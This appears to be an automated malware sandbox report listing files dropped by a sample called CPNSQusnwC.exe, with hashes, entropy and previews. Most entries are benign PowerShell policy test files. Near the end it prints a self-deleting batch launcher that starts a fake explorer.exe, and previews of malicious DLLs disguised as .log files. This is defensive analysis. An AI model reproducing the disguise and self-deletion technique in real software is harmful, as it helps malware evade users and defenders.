                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tq51tyrz.i5o.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twp4zbvl.t0a.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5vvngw1.vrk.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubqtkeow.hwt.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ustne1or.v3t.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzjhomja.yof.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzpqpaqc.s4b.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhnc0ft4.5dh.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnxigikx.40z.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xefeh2bu.2gp.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiokyjdc.kba.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkz2sksv.e23.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwvz0nlr.fyy.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3eklq3z.ias.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yc5cesfm.mmg.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0ifxu2d.3g5.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaouvesx.xms.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcwwlhpd.box.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkpqfr24.5ew.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znhc1zsv.xbw.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zywc3wet.grd.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):186
                                                      Entropy (8bit):5.102181105778648
                                                      Encrypted:false
                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQC/iEaKC5SufA0XvbBktKcKZG1N+E2J5xAIVQ:hCRLuVFOOr+DE1WD5SaZ5Sub/bKOZG1v
                                                      MD5:CC97FBB648FE5B389D5CFB586479881D
                                                      SHA1:FD616E963DAFA7CD2946F11CDB35B12E650D23E6
                                                      SHA-256:83D0307CB2A742B36C6B175028AD537E7C3B6AF10FABC420496C431E264EE4B8
                                                      SHA-512:9000F82418DADC4EAA636729F5BD2E9ACCFDB1CE1266210298F19CEE5305DF8958D2290BFC147584EFB2C3BAC9E4B4F65C54A4F9D855E9EBA974D2410343F442
                                                      Malicious:true
                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qWYjuUdv6Q.bat"

                                                      C:\Users\user\Desktop\AxLDtRxd.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Joe Sandbox View:
                                                      • Filename: 0wdppTE7Op.exe, Detection: malicious, Browse
                                                      • Filename: JNKHlxGvw4.exe, Detection: malicious, Browse
                                                      • Filename: xoCq1tvPcm.exe, Detection: malicious, Browse
                                                      • Filename: Dfim58cp4J.exe, Detection: malicious, Browse
                                                      • Filename: KyC6hVwU8Z.exe, Detection: malicious, Browse
                                                      • Filename: 4si9noTBNw.exe, Detection: malicious, Browse
                                                      • Filename: eu6OEBpBCI.exe, Detection: malicious, Browse
                                                      • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: FToZAUe1tw.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                      C:\Users\user\Desktop\CxYvgXXc.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.660491370279985
                                                      Encrypted:false
                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                      MD5:240E98D38E0B679F055470167D247022
                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\DiqTAfIW.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\DrOTkRbS.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):23552
                                                      Entropy (8bit):5.529329139831718
                                                      Encrypted:false
                                                      SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                      MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                      SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                      SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                      SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\ELylTcFa.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
